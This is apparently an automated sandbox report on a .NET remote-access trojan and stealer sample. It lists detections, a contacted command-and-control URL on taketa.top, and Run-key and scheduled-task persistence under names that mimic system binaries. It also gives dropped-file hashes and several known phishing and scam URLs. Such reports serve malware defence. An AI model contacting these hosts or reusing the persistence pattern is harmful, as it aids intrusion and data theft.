C:\Recovery\SystemSettings.exe	100%	Joe Sandbox ML
C:\fontrefcrt\WmiPrvSE.exe	100%	Joe Sandbox ML
C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	100%	Joe Sandbox ML
C:\Windows\System32\SecurityHealthSystray.exe	100%	Joe Sandbox ML
C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe	100%	Joe Sandbox ML
C:\fontrefcrt\MsintoRefcommonsvc.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	74%	Virustotal		Browse
C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe	74%	Virustotal		Browse
C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	74%	Virustotal		Browse
C:\Recovery\SystemSettings.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\SystemSettings.exe	74%	Virustotal		Browse
C:\Users\user\Desktop\iJCvyQAH.log	17%	ReversingLabs
C:\Users\user\Desktop\iJCvyQAH.log	25%	Virustotal		Browse
C:\Users\user\Desktop\wNZUMzpS.log	17%	ReversingLabs
C:\Users\user\Desktop\wNZUMzpS.log	25%	Virustotal		Browse
C:\fontrefcrt\MsintoRefcommonsvc.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\fontrefcrt\MsintoRefcommonsvc.exe	74%	Virustotal		Browse
C:\fontrefcrt\WmiPrvSE.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\fontrefcrt\WmiPrvSE.exe	74%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
taketa.top	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://taketa.top/JavascriptPollMultigeneratordatalife.php	1%	Virustotal		Browse
http://taketa.top	1%	Virustotal		Browse
http://taketa.top/	1%	Virustotal		Browse
http://taketa.top/JavascriptPollMultigeneratordatalife.php	0%	Avira URL Cloud	safe
http://taketa.top/	0%	Avira URL Cloud	safe
http://taketa.top	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
taketa.top	104.21.16.102	true	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://taketa.top/JavascriptPollMultigeneratordatalife.php	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MsintoRefcommonsvc.exe, 00000005.00000002.1885029457.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 0000001F.00000002.1984917636.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://taketa.top	conhost.exe, 0000001F.00000002.1984917636.00000000038D0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 0000001F.00000002.1984917636.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://taketa.top/	conhost.exe, 0000001F.00000002.1984917636.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.16.102	taketa.top	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431967
Start date and time:	2024-04-26 05:16:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	57
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	yX8787W7de.exe renamed because original name is a hash value
Original Sample Name:	10f54a1a68bce057dc9abbc2851a6235.exe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winEXE@52/31@1/1
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SystemSettings.exe, SIHClient.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target MsintoRefcommonsvc.exe, PID 7224 because it is empty
Execution Graph export aborted for target MsintoRefcommonsvc.exe, PID 7240 because it is empty
Execution Graph export aborted for target SwjJGfgwqbpLdPqvPFcqLsY.exe, PID 7260 because it is empty
Execution Graph export aborted for target SwjJGfgwqbpLdPqvPFcqLsY.exe, PID 7284 because it is empty
Execution Graph export aborted for target conhost.exe, PID 7184 because it is empty
Execution Graph export aborted for target conhost.exe, PID 7200 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:17:18	Task Scheduler	Run new task: conhost path: "C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe"
04:17:18	Task Scheduler	Run new task: conhostc path: "C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe"
04:17:18	Task Scheduler	Run new task: MsintoRefcommonsvc path: "C:\fontrefcrt\MsintoRefcommonsvc.exe"
04:17:18	Task Scheduler	Run new task: MsintoRefcommonsvcM path: "C:\fontrefcrt\MsintoRefcommonsvc.exe"
04:17:18	Task Scheduler	Run new task: SwjJGfgwqbpLdPqvPFcqLsY path: "C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe"
04:17:18	Task Scheduler	Run new task: SwjJGfgwqbpLdPqvPFcqLsYS path: "C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe"
04:17:18	Task Scheduler	Run new task: SystemSettings path: "C:\Recovery\SystemSettings.exe"
04:17:18	Task Scheduler	Run new task: SystemSettingsS path: "C:\Recovery\SystemSettings.exe"
04:17:19	Task Scheduler	Run new task: WmiPrvSE path: "C:\fontrefcrt\WmiPrvSE.exe"
04:17:19	Task Scheduler	Run new task: WmiPrvSEW path: "C:\fontrefcrt\WmiPrvSE.exe"
04:17:20	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Recovery\SystemSettings.exe"
04:17:28	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SwjJGfgwqbpLdPqvPFcqLsY "C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe"
04:17:36	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe"
04:17:45	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\fontrefcrt\WmiPrvSE.exe"
04:17:53	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MsintoRefcommonsvc "C:\fontrefcrt\MsintoRefcommonsvc.exe"
04:18:02	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Recovery\SystemSettings.exe"
04:18:10	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SwjJGfgwqbpLdPqvPFcqLsY "C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe"
04:18:21	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe"
04:18:29	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\fontrefcrt\WmiPrvSE.exe"
04:18:38	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MsintoRefcommonsvc "C:\fontrefcrt\MsintoRefcommonsvc.exe"
04:18:46	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Recovery\SystemSettings.exe"
04:18:57	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SwjJGfgwqbpLdPqvPFcqLsY "C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe"
05:17:26	API Interceptor	1x Sleep call for process: conhost.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MDg4MzE4LCJtZXNzYWdlX2lkIjoiMGd4dnAwdGZzeWpiNm4yamRiMDRuYWd5IzcyNWE1YTc5LTgxYzQtNGM0Yy1iNmI1LTdmMTY0MTM2ZTE2NCIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjI0MzE4LCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtLmJyYWRlbnRvbmNjLmluZm8vP2VvdmlldWJyJnFyYz1yZW5lZS5zY2h3YXJ0ekBxci5jb20uYXUiLCJpbmRpdmlkdWFsX2lkIjoiODdiZTY3MTdlZjJmMThjYzI3YmMyMWQ4OTJhY2Q2NzAifQ.iusDS7mld4iiq9DDY82R1MJ9ToHxmMDW3SMbDENZOZQ	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	Payment Swift.doc	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	https://marinatitle.com	Get hash	malicious	Unknown	Browse	104.17.24.14
	ad.msi	Get hash	malicious	Latrodectus	Browse	172.67.219.28
	https://ndw5xvotehflt.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	104.21.53.38
	https://cnmxukx5efilc7lvlel.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	172.66.44.161
	https://m7qfa5ng4lp7.blob.core.windows.net/m7qfa5ng4lp7/1.html?4rKpnF7821CfLO43wsacrvmomp962ETPJQJTKIDNZNNV65316UFUY14332V14#14/43-7821/962-65316-14332	Get hash	malicious	Phisher	Browse	104.18.26.50
	https://bocmyw606y.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	172.66.44.172
	https://uporniacomnuvidx.z13.web.core.windows.net/index.html	Get hash	malicious	TechSupportScam	Browse	104.17.25.14
	https://markssmith.icu/23d80j2d/qwd13d8jqd/index.html?13813e8=0101%2048076%2044139&13813e8=https://playgames5.net	Get hash	malicious	TechSupportScam	Browse	104.21.12.42

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\iJCvyQAH.log	C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	hfGA6tjyxY.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	3m7cmtctck.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse
	jXtV6KO1A7.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	fDTPlvsGfH.exe	Get hash	malicious	DCRat	Browse
	W4tW72sfAD.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	8CDSiIApNr.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	3otr19d5Oq.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	idYLOQOVSi.exe	Get hash	malicious	DCRat	Browse
	ZAF4Dsu737.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\088424020bedd6

Download File

Process:	C:\fontrefcrt\MsintoRefcommonsvc.exe
File Type:	ASCII text, with very long lines (620), with no line terminators
Category:	dropped
Size (bytes):	620
Entropy (8bit):	5.89592113141996
Encrypted:	false
SSDEEP:	12:6tZDfxAM6wqtPONKKWxMfB43lQbuVxhEAZAFbyyYaoJNqIY3NGPA:uDJAYsPKKhM5WlCuVxeAZAQyBoKhNOA
MD5:	97DADBD35F4727DD279C979BA00FE8CE
SHA1:	CFFC66453FAC7AC272C34BE02CBD80CA4D9EDF17
SHA-256:	AB1F75182A84E03B859BD11608C568AA5BD86763485796FF3FFA1575167CB691
SHA-512:	509AEA88B20B1403C722FD5CBAF84F2F9DBED5A8C9430DB80A4A1270FFE2490647BB06A98AF8D6CC84E1A0E1E5BED487BF514B07C93AB1A84272879531CEB4ED
Malicious:	false
Preview:	1zxJZoDTJbJU7hEyDqDhfVzmfCHjhAGI1A0AzMWbxZHO7oaXRF6m1rHf9KoXgevIUBd6rE80TluFOlo0luRcEeRJ3UBoi95Tn836LdpMGFSQ7BRYgxvwMTE0tUDXDUSUpbcPrspIEFV9LBL2CnIvNJGU4DM1aSJwx8kgiCqxInrH7FpsILVaLhGgUHUogyrv5jLNboT96Vnkb9XzYdsP7tlQ1DMbsCRT55LY3bRe1Vdz4gFVuePCGbyM75WXc2Q3DTofx966MOXlPvWV70qNwPNdH9a7F3B9Fjwk1jhviSz1EM6MjBZlLCGyFKYyi81SMYgq9vdXT4peZVZ4CNXEdZxCc7erLtNjbgpppQNyhBSRXmYuudvUlwyxleNBQvLjrFC2quPwAjgcHfoziu6s728os2ELCLhwzsjRkfDAO9UBQWpFzXdfzdmzHXKypDtzBumY5XPCq5e7h7YVM9VorB6WGuKMVPUKPe9fuRJcIaz38pRK9zmqrEIAxPSLNCrbkUrD72k403gRMDYbcANfnocKW9sf97PGsXSo7OMGOr0yi1xu11sMyLy61gr7KF42oZizutdOxGR5ynmfM7oIPCRhiWwagO6Iw7KIS8AHXdZs

C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe

Download File

Process:	C:\fontrefcrt\MsintoRefcommonsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1689088
Entropy (8bit):	7.442451366206663
Encrypted:	false
SSDEEP:	24576:yscKze7Cuj+1u6YVz+AOJCxYdSxb5MNi4mJy57SPw3eKS+JE204XH+zheSO6vfqU:H6n+0YdQ+iylSI3DE2o7OO
MD5:	65F6B916C8BD52DDAD601807F96BC373
SHA1:	F02DC96FDCFA8F9F15A6DA9F333516E17429693C
SHA-256:	A63B87ED58BED0EC8EACD16F57045A25A05D03BFC6A0B4957F45C76997BEC0D8
SHA-512:	0DD14259265F466576FB8DF29E9ABB4F5DB97EA8A48A8F6AEE5F2C75AE7A0EEBB96EC828C755B901B5DAB79A9B3ADC1F5151D0C7DD407F36ECB6C7AA8D2868A7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83% Antivirus: Virustotal, Detection: 74%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....e............................>.... ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B................ .......H..............................l........................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{c...9....& ....8....(.... ....8....(.... ....~....{....9....& ....8........0..)....... ........8........E........N...)...............8....8.... ....~....{{...9....& ....8.......... ....~....{....:....& ....8....~....(H... .... .... ....s....~....(L....... ....8_...r...ps....z~....:.... ....~....{....95...& ....8.......~....(P.

C:\Program Files\Internet Explorer\en-US\31d454e2f3d20a

Download File

Process:	C:\fontrefcrt\MsintoRefcommonsvc.exe
File Type:	ASCII text, with very long lines (636), with no line terminators
Category:	dropped
Size (bytes):	636
Entropy (8bit):	5.875860515069943
Encrypted:	false
SSDEEP:	12:m8s4RYDREkGWmQgP+vgOOh9YrhC3/JOq8z3dL3tNqmrW:nsbDR0TP+r09YFCxH+3t+mS
MD5:	8FED7AEB10F38BCE0CA60FF6337998C7
SHA1:	DD258D165962736DF3B96D1FA7616EBFACECF403
SHA-256:	2C921E5425A08FB4CAD46FE032120EFF64F34BA370BA06B4F9E9C113C000322D
SHA-512:	F4DC29A3CB4380D3817D5850D302470B917A5C0187F3E40B4785CC170E5CA551E852ECD15AD5CBE773B9EF3C0DFED068A5A573B2A3A2717AE6B0C14E1ED0F817
Malicious:	false
Preview:	lIAQX6DriJII0ddMN7gvvmjmpOifUcurAUiASsmKTw1iwvRub9iO5B18jYkJXhWFZaHf4d4fVVb9vA047yEV4fw8cka3HcwwZvJVnv07FD3jk2NihpMjcBK3oJDUCAX2iojA1fRL8HP1mMYjX2WcQNTXkPqdsg5FpAA5TMrBYAlVvTRbud6Jn5lVUMZlyxdcLKMlMcQKKVDQl8lR7PtPjvbuZplHxFMkhJKlHqPSMw9S1VtWkHojEN2ZsbMh1JWEIdscyAKQAaCwwJ3D5OgpbnfTQu3peraCa4KXmRhk7XinLGnjiImmmqne7ZMDHewSA9W18fbor6sEE2IKHUHWFyatRpaNFedckQnLtvkDr85q7jZFQC6wXaNLjmkTENiMdQdyO7aVtDoH2tvrPV6DhqEKDblGKQ8dZsMqFl0TlkDUvFSz12DsRfpxMSvxVTKcELsKhEmofmb6nuZ7IvPSNPM3DZew0C8SakPkXISwQZNoEsKc3xojD2Pz8zHHkzxcoIgCeykAcdByChyUPB3CYYPhUalhBLLblv95MH7ENnHj1awaAw2i6vDQ39sENC9RSkNRi3IHEyzuRpp3nKhOSmfzrtBNY31KozRRNf2HoueH6T9OTybCfv8pFXjy

C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe

Download File

Process:	C:\fontrefcrt\MsintoRefcommonsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1689088
Entropy (8bit):	7.442451366206663
Encrypted:	false
SSDEEP:	24576:yscKze7Cuj+1u6YVz+AOJCxYdSxb5MNi4mJy57SPw3eKS+JE204XH+zheSO6vfqU:H6n+0YdQ+iylSI3DE2o7OO
MD5:	65F6B916C8BD52DDAD601807F96BC373
SHA1:	F02DC96FDCFA8F9F15A6DA9F333516E17429693C
SHA-256:	A63B87ED58BED0EC8EACD16F57045A25A05D03BFC6A0B4957F45C76997BEC0D8
SHA-512:	0DD14259265F466576FB8DF29E9ABB4F5DB97EA8A48A8F6AEE5F2C75AE7A0EEBB96EC828C755B901B5DAB79A9B3ADC1F5151D0C7DD407F36ECB6C7AA8D2868A7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83% Antivirus: Virustotal, Detection: 74%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....e............................>.... ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B................ .......H..............................l........................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{c...9....& ....8....(.... ....8....(.... ....~....{....9....& ....8........0..)....... ........8........E........N...)...............8....8.... ....~....{{...9....& ....8.......... ....~....{....:....& ....8....~....(H... .... .... ....s....~....(L....... ....8_...r...ps....z~....:.... ....~....{....95...& ....8.......~....(P.

C:\Recovery\31d454e2f3d20a

Download File

Process:	C:\fontrefcrt\MsintoRefcommonsvc.exe
File Type:	ASCII text, with very long lines (378), with no line terminators
Category:	dropped
Size (bytes):	378
Entropy (8bit):	5.832383176902931
Encrypted:	false
SSDEEP:	6:wXTTR0fr3q1Uc8d4W17ZxJH34lVr27HRjS+DuLWbES2cdzxhHezddPWjIENYsko5:wjFsr6/W17PEuxjS+yw7d/ehdPW3DNWU
MD5:	06EA095113BFA5D2C8ADDEBB4C1CB993
SHA1:	7FE606B5FBC33039F6907AF0D0B1DFB21114BA45
SHA-256:	B330CE6B69CA5ED35E1479E85FC0A7CB82D1C0C54912927EE0958EC6D3469E0A
SHA-512:	AA543D566FC08EA822711C1C011641E1D2E180DA1A3FA46EA84392C501886F3C04A7053FF24D508E015E0ED0B5B276F959945B3436EEF1E13AB1018CA1639988
Malicious:	false
Preview:	EPQphU21TlqCKj211TDxKyXTX2uZMc8R0soceA4f4TgdnMcVlNROLCMQ16Rokcp1nYLc5aW1Zh31S3qKZYx8KuGxgXkhsP5coo0PBAaL0aynJV88QGPLoqq3RX5h0yJJmaMnDaJY8mHu5doLZlRlAtx7867nF2VBQpBtIU5z60NBi58ytuHOhhI3mOoGdgTFRGdPb4CEqboJgvZD8I3UvHetgIG4qyWZgHucbsWysChF28W0zlIUn9UKmusTyIY2FPmZB6mPvEmskY0hvPEFpCwhwk0qADAjnoAnW7z283ijXmjN3KijDTNDcFmaG5OsECE5XNLxZMGvdNKKAmwzeagUa7KQVZwDo0fUho0q8vJ0NbjP4bZdIYOnfu

C:\Recovery\9e60a5f7a3bd80

Download File

Process:	C:\fontrefcrt\MsintoRefcommonsvc.exe
File Type:	ASCII text, with very long lines (396), with no line terminators
Category:	dropped
Size (bytes):	396
Entropy (8bit):	5.844851025155077
Encrypted:	false
SSDEEP:	12:KIxLw+IcvwXqKTm1ydlFNfeK5gszjjzXeIEharTL:i9qKXZJe+eI1TL
MD5:	E61DE3E7870CD84D89E004D63F82A1D3
SHA1:	EFDE8CEB0B3D2FE322AC74A1D82828F126D8103B
SHA-256:	66A970BF20102393EF62F9FB8FA263D61AB3E58F19661171120CAD3778990391
SHA-512:	B78C1595001A69D644D09F5DD241EB654964952A4FD502177E1CB73A809C918B106211E7A44E9B133E6F48D0BAD37ED1F3564298F60D7776BDD1BE56B4BDC2DA
Malicious:	false
Preview:	YqHSajhIX3Yux3kczp30mLz5EQtCTLRMh04ITuELagrdLEDBIsG9MlwM0LNJzfyLmLM79cJFkrZFeVu9Ms3lESA6DrRHg4V5sg191FBqjAYeLqsebO7GmMGULQ3RKBjpVeW8euIGqNCD4fuW9xpS7PSfZhykLughbsIqUuArF0ZYKCaqggSWWRsGL0i66i46remLWDCOw8MHz3UWHHEpcJLKABfdLDuh5drqaOTceDkXEkRRfMzydPdiTcLUiiCtNpLVMo63ylKYjxFZuN79O6DpAJW7D935A0JZY6F0Q6A1FE8fXwkVlDfRlgVCS80yrPYsnpAyHGtS6Mk5K1kQZiU7V2y2kDiRGLJzqQ1rvvNeTMUZ5a1bXjZI4aWv0HNEibLvCuO492fn

C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe

Download File

Process:	C:\fontrefcrt\MsintoRefcommonsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1689088
Entropy (8bit):	7.442451366206663
Encrypted:	false
SSDEEP:	24576:yscKze7Cuj+1u6YVz+AOJCxYdSxb5MNi4mJy57SPw3eKS+JE204XH+zheSO6vfqU:H6n+0YdQ+iylSI3DE2o7OO
MD5:	65F6B916C8BD52DDAD601807F96BC373
SHA1:	F02DC96FDCFA8F9F15A6DA9F333516E17429693C
SHA-256:	A63B87ED58BED0EC8EACD16F57045A25A05D03BFC6A0B4957F45C76997BEC0D8
SHA-512:	0DD14259265F466576FB8DF29E9ABB4F5DB97EA8A48A8F6AEE5F2C75AE7A0EEBB96EC828C755B901B5DAB79A9B3ADC1F5151D0C7DD407F36ECB6C7AA8D2868A7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83% Antivirus: Virustotal, Detection: 74%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....e............................>.... ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B................ .......H..............................l........................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{c...9....& ....8....(.... ....8....(.... ....~....{....9....& ....8........0..)....... ........8........E........N...)...............8....8.... ....~....{{...9....& ....8.......... ....~....{....:....& ....8....~....(H... .... .... ....s....~....(L....... ....8_...r...ps....z~....:.... ....~....{....95...& ....8.......~....(P.

C:\Recovery\SystemSettings.exe

Download File

Process:	C:\fontrefcrt\MsintoRefcommonsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1689088
Entropy (8bit):	7.442451366206663
Encrypted:	false
SSDEEP:	24576:yscKze7Cuj+1u6YVz+AOJCxYdSxb5MNi4mJy57SPw3eKS+JE204XH+zheSO6vfqU:H6n+0YdQ+iylSI3DE2o7OO
MD5:	65F6B916C8BD52DDAD601807F96BC373
SHA1:	F02DC96FDCFA8F9F15A6DA9F333516E17429693C
SHA-256:	A63B87ED58BED0EC8EACD16F57045A25A05D03BFC6A0B4957F45C76997BEC0D8
SHA-512:	0DD14259265F466576FB8DF29E9ABB4F5DB97EA8A48A8F6AEE5F2C75AE7A0EEBB96EC828C755B901B5DAB79A9B3ADC1F5151D0C7DD407F36ECB6C7AA8D2868A7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\SystemSettings.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SystemSettings.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83% Antivirus: Virustotal, Detection: 74%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....e............................>.... ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B................ .......H..............................l........................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{c...9....& ....8....(.... ....8....(.... ....~....{....9....& ....8........0..)....... ........8........E........N...)...............8....8.... ....~....{{...9....& ....8.......... ....~....{....:....& ....8....~....(H... .... .... ....s....~....(L....... ....8_...r...ps....z~....:.... ....~....{....95...& ....8.......~....(P.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MsintoRefcommonsvc.exe.log

Download File

Process:	C:\fontrefcrt\MsintoRefcommonsvc.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1306
Entropy (8bit):	5.353303787007226
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4T
MD5:	BD55EA7BCC4484ED7DE5C6F56A64EF15
SHA1:	76CBF3B5E5A83EC67C4381F697309877F0B20BBE
SHA-256:	81E0A3669878ED3FFF8E565607FB86C5478D7970583E7010D191A8BC4E5066B6
SHA-512:	B50A3F8F5D18D3F1C85A6A5C9A46258B1D6930B75C847F0FB6E0A7CD0627E4690125BB3171A2D6554DEBE240ADAB2FF23ABDECA9959357B48089CFBF1F0D9FD8
Malicious:	false
